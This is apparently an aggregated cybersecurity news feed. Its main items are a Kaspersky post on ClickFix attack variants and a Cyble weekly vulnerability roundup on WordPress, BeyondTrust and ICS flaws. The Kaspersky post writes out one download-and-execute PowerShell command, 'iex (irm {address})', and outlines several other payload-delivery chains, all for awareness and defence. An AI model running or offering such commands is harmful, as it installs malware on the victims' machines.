Google Disrupts Chinese Cyberespionage Campaign Targeting Telecoms, Governments

The UNC2814 threat actor has been active since at least 2017, targeting organizations across 42 countries. 

The post Google Disrupts Chinese Cyberespionage Campaign Targeting Telecoms, Governments appeared first on SecurityWeek.

SecurityWeek – ​Read More

Variations of the ClickFix | Kaspersky official blog

About a year ago, we published a post about the ClickFix technique, which was gaining popularity among attackers. The essence of attacks using ClickFix boils down to convincing the victim, under various pretexts, to run a malicious command on their computer. That is, from the cybersecurity solutions point of view, it’s run on behalf of the active user and with their privileges.

In early uses of this technique, cybercriminals tried to convince victims that they need to execute a command to fix some problem or to pass a captcha, and in the vast majority of cases, the malicious command was a PowerShell script. However, since then, attackers have come up with a number of new tricks that users should be warned about, as well as a number of new variants of malicious payload delivery, which are also worth keeping an eye on.

Use of mshta.exe

Last year, Microsoft experts published a report on cyberattacks targeting hotel owners working with Booking.com. The attackers sent out fake notifications from the service, or emails pretending to be from guests drawing attention to a review. In both cases, the email contained a link to a website imitating Booking.com, which asked the victim to prove that they were not a robot by running a code via the Run menu.

There are two key differences between this attack and ClickFix. First, the user isn’t asked to copy the string (after all, a string with code sometimes arouses suspicion). It’s copied to the exchange buffer by the malicious site – probably when the user clicks on a checkbox that mimics the reCAPTCHA mechanism. Second, the malicious string calls the legitimate mshta.exe utility, which serves to run applications written in HTML. It contacts the attackers’ server and executes the malicious payload.

Video on TikTok and PowerShell with administrator privileges

BleepingComputer published an article in October 2025 about a campaign spreading malware through instructions in TikTok videos. The videos themselves imitate video tutorials on how to activate proprietary software for free. The advice they give boils down to a need to run PowerShell with administrator rights and then execute the command iex (irm {address}). Here, the irm command downloads a malicious script from a server controlled by attackers, and the iex (Invoke-Expression) command runs it. The script, in turn, downloads an infostealer malware to the victim’s computer.

Using the Finger protocol

Another unusual variant of the ClickFix attack uses the familiar captcha trick, but the malicious script uses the outdated Finger protocol. The utility of the same name allows anyone to request data about a specific user on a remote server. The protocol is rarely used nowadays, but it is still supported by Windows, macOS, and a number of Linux-based systems.

The user is persuaded to open the command line interface and use it to run a command that establishes a connection via the Finger protocol (using TCP port 79) with the attackers’ server. The protocol only transfers text information, but this is enough to download another script to the victim’s computer, which then installs the malware.

CrashFix variant

Another variant of ClickFix differs in that it uses more sophisticated social engineering. It was used in an attack on users trying to find a tool to block advertising banners, trackers, malware, and other unwanted content on web pages. When searching for a suitable extension for Google Chrome, victims found something called NexShield – Advanced Web Guardian, which was in fact a clone of real working software, but which at some point crashed the browser and displayed a fake notification about a detected security problem and the need to run a “scan” to fix the error. If the user agreed, they received instructions on how to open the Run menu and execute a command that the extension had previously copied to the clipboard.

The command copied the familiar finger.exe file to a temporary directory, renamed it ct.exe, and then launched it with the attacker’s address. The rest of the attack was the same as in the abovementioned case. In response to the Finger protocol request, a malicious script was delivered, which launched and installed a remote access Trojan (in this case, ModeloRAT).

Malware delivery via DNS lookup

The Microsoft Threat Intelligence team also shared a slightly more complex than usual ClickFix attack variant. Unfortunately, they didn’t describe the social engineering trick, but the method of delivering the malicious payload is quite interesting. Probably in order to complicate detection of the attack in a corporate environment and prolong the life of the malicious infrastructure, the attackers used an additional step: contacting a DNS server controlled by the attackers.

That is, after the victim is somehow persuaded to copy and execute a malicious command, a request is sent to the DNS server on behalf of the user via the legitimate nslookup utility, requesting data for the example.com domain. The command contained the address of a specific DNS server controlled by the attackers. It returns a response that, among other things, returned a string with malicious script, which in turn downloads the final payload (in this attack, ModeloRAT again).

Cryptocurrency bait and JavaScript as payload

The next attack variant is interesting for its multi-stage social engineering. In comments on Pastebin, attackers actively spread a message about an alleged flaw in the Swapzone.io cryptocurrency exchange service. Cryptocurrency owners were invited to visit a resource created by fraudsters, which contained full instructions on how to exploit this flaw, which can make up to $13,000 in a couple of days.

The instructions explain how the service’s flaws can be exploited to exchange cryptocurrency at a more favorable rate. To do this, a victim needs to open the service’s website in the Chrome browser, manually type “javascript:” in the address bar, and then paste the JavaScript script copied from the attackers’ website and execute it. In reality, of course, the script cannot affect exchange rates in any way; it simply replaces Bitcoin wallet addresses and, if the victim actually tries to exchange something, transfers the funds to the attackers’ accounts.

How to protect your company from ClickFix attacks

The simplest attacks using the ClickFix technique can be countered by blocking the [Win] + [R] key combination on work devices. But, as we see from the examples listed, this is far from the only type of attack in which users are asked to run malicious code themselves.

Therefore, the main advice is to raise employee cybersecurity awareness. They must clearly understand that if someone asks them to perform any unusual manipulations with the system, and/or copy and paste code somewhere, then in most cases this is a trick used by cybercriminals. Security awareness training can be organized using the Kaspersky Automated Security Awareness Platform.

In addition, to protect against such cyberattacks, we recommend:

Kaspersky official blog – ​Read More

One Identity Appoints Michael Henricks as Chief Financial and Operating Officer

Alisa Viejo, CA, United States, 25th February 2026, CyberNewswire

Hackread – Cybersecurity News, Data Breaches, AI and More – ​Read More

The Week in Vulnerabilities: WordPress, BeyondTrust, and Critical ICS Bugs

Cyble Weekly vulnerability

Cyble Research & Intelligence Labs (CRIL) tracked 1,102 vulnerabilities last week. Of these, 166 vulnerabilities already have publicly available Proof-of-Concept (PoC) exploits, significantly increasing the likelihood of real-world attacks. A total of 49 vulnerabilities were rated critical under CVSS v3.1, while 32 received critical severity under CVSS v4.0.  

Additionally, CISA added 9 vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, citing confirmed active exploitation. 

On the industrial front, CISA issued 8 ICS advisories covering 18 vulnerabilities impacting Siemens, Honeywell, Delta Electronics, GE Vernova, PUSR, EnOcean, Valmet, and Welker products. 

Cyble Weekly Vulnerability Report: New Flaws and CVEs

CVE-2026-1357 — WPvivid Backup & Migration Plugin (Critical) 

CVE-2026-1357 is a critical unauthenticated arbitrary file upload and remote code execution vulnerability affecting the WPvivid Backup & Migration plugin for WordPress. The flaw stems from improper handling of RSA decryption errors combined with unsanitized filename inputs, allowing attackers to upload malicious PHP shells to publicly accessible directories  

A public PoC is available, and the vulnerability surfaced in underground discussions shortly after disclosure, significantly lowering the barrier to exploitation. 

CVE-2026-1731 — BeyondTrust Remote Support & PRA (Critical) 

CVE-2026-1731 is a critical OS command injection vulnerability in BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA). The flaw exists within a WebSocket-based endpoint, allowing unauthenticated attackers to execute arbitrary commands on internet-facing instances. 

Successful exploitation enables full system compromise, data exfiltration, lateral movement, and persistent access. A PoC is publicly available. 

CVE-2025-49132 — Pterodactyl Panel (Critical) 

CVE-2025-49132 affects the Pterodactyl Panel game-server management platform and allows unauthenticated remote code execution through improper validation of user-controlled parameters. 

Threat actors were observed sharing weaponized exploits on underground forums, highlighting the vulnerability’s operational risk. 

CVE-2026-25639 — Axios HTTP Client (High Severity) 

CVE-2026-25639 is a denial-of-service vulnerability in the Axios HTTP client, where crafted JSON payloads exploiting improper configuration merging can crash Node.js or browser applications. 

The vulnerability was captured in underground forums shortly after disclosure and has a public PoC.  

CVE-2026-20841 — Windows Notepad (High Severity) 

CVE-2026-20841 is a command injection vulnerability in the Windows Notepad app, enabling execution of malicious payloads via specially crafted files. Exploitation could enable privilege escalation and malware deployment. 

Vulnerabilities Added to CISA KEV 

CISA added 9 vulnerabilities to the KEV catalog during the reporting period. 

Notable additions include: 

  • CVE-2026-2441 — Google Chrome use-after-free vulnerability enabling potential arbitrary code execution via crafted HTML.  

  • CVE-2025-15556 — Notepad++ update integrity verification vulnerability reportedly exploited by the China-linked threat actor Lotus Blossom. 

KEV additions serve as strong indicators of exploitation maturity and heightened ransomware or espionage risk. 

Critical ICS Vulnerabilities 

During the reporting period, CISA issued 8 ICS advisories covering 18 vulnerabilities. The majority were rated high severity. 

CVE-2026-1670 — Honeywell CCTV Products (Critical) 

CVE-2026-1670 affects Honeywell CCTV products and carries a CVSS score of 9.8. The vulnerability allows an unauthenticated attacker to remotely alter the password recovery email address, effectively hijacking administrator accounts. 

Successful exploitation enables: 

  • Full administrative account takeover 

  • Unauthorized access to live surveillance feeds 

  • Potential lateral movement into connected networks 

Because no credentials or user interaction are required, this vulnerability presents a high mass-exploitation risk. 

CVE-2026-25715 — PUSR USR-W610 Router (Critical) 

CVE-2026-25715 impacts the PUSR USR-W610 router and involves weak password requirements. If exploited, attackers can bypass authentication, compromise administrator credentials, or disrupt services. 

The risk is amplified by the vendor’s acknowledgment that the product has reached end-of-life and no patches are planned. Organizations are urged to isolate or replace affected devices immediately. 

Siemens Simcenter Vulnerabilities (High Severity Cluster) 

Multiple high-severity out-of-bounds read/write and buffer overflow vulnerabilities were disclosed in Siemens Simcenter Femap and Nastran products (CVE-2026-23715 through CVE-2026-23720). These flaws may enable memory corruption and potential code execution in industrial engineering environments. 

Impacted Critical Infrastructure Sectors 

Analysis of the 18 disclosed ICS vulnerabilities shows that Critical Manufacturing accounts for 61.1% of cases, with the sector appearing in 83.3% of all reported vulnerabilities. This concentration highlights the continued exposure of manufacturing environments and their interdependencies with Energy, Water, and Chemical sectors. 

Conclusion 

The combination of high-volume IT vulnerabilities, publicly available PoCs, underground exploit discussions, and critical ICS exposures underscores the evolving threat landscape across enterprise and industrial environments. 

With 166 PoCs already available and 9 KEV additions confirming active exploitation, organizations must adopt a risk-based vulnerability management approach that prioritizes: 

  • Rapid patching of internet-facing assets 

  • Strict network segmentation between IT and OT environments 

  • Removal or isolation of end-of-life devices 

  • Deployment of multi-factor authentication 

  • Continuous monitoring for anomalous behavior 

  • Routine vulnerability assessments and penetration testing 

Cyble’s attack surface management solutions enable organizations to continuously monitor exposures, prioritize remediation, and detect early warning signals of exploitation. Additionally, Cyble’s threat intelligence and third-party risk intelligence capabilities provide visibility into vulnerabilities actively discussed in underground communities, empowering proactive defense against both IT and ICS threats. 

The post The Week in Vulnerabilities: WordPress, BeyondTrust, and Critical ICS Bugs appeared first on Cyble.

Cyble – ​Read More

Why ‘Call This Number’ TOAD Emails Beat Gateways

Attackers are bypassing email gateways through telephone-oriented attack delivery (TOAD), in which the only email payload is a phone number.

darkreading – ​Read More

Is Alexa+ too cheerful for you? Now you can select among 3 personality styles – here’s how

I don’t need an ‘easy peasy lemon squeezy’ response when I ask Alexa to turn off a lamp – a simple ‘OK’ will do.

Latest news – ​Read More

Over 12 Million Users Impacted by CarGurus Data Breach

Hackers claim to have stolen personally identifiable information and internal corporate data from the automotive firm.

The post Over 12 Million Users Impacted by CarGurus Data Breach appeared first on SecurityWeek.

SecurityWeek – ​Read More

Ex-US Defense Contractor Executive Jailed for Selling Exploits to Russia

Peter Williams was sentenced to 87 months in prison for selling cyber exploits to a Russian broker.

The post Ex-US Defense Contractor Executive Jailed for Selling Exploits to Russia appeared first on SecurityWeek.

SecurityWeek – ​Read More

Autonomous Endpoint Management Isn’t Just Efficiency, It’s a Security Imperative

Autonomous Endpoint Management cuts exposure time by matching patch speed to attacker breakout timelines, reducing risk, workload delays, and breach costs.

Hackread – Cybersecurity News, Data Breaches, AI and More – ​Read More

SecurityWeek Report: 426 Cybersecurity M&A Deals Announced in 2025

SecurityWeek’s M&A data indicates that today’s market is more disciplined, and it seems to favor GRC, data protection, and identity.

The post SecurityWeek Report: 426 Cybersecurity M&A Deals Announced in 2025 appeared first on SecurityWeek.

SecurityWeek – ​Read More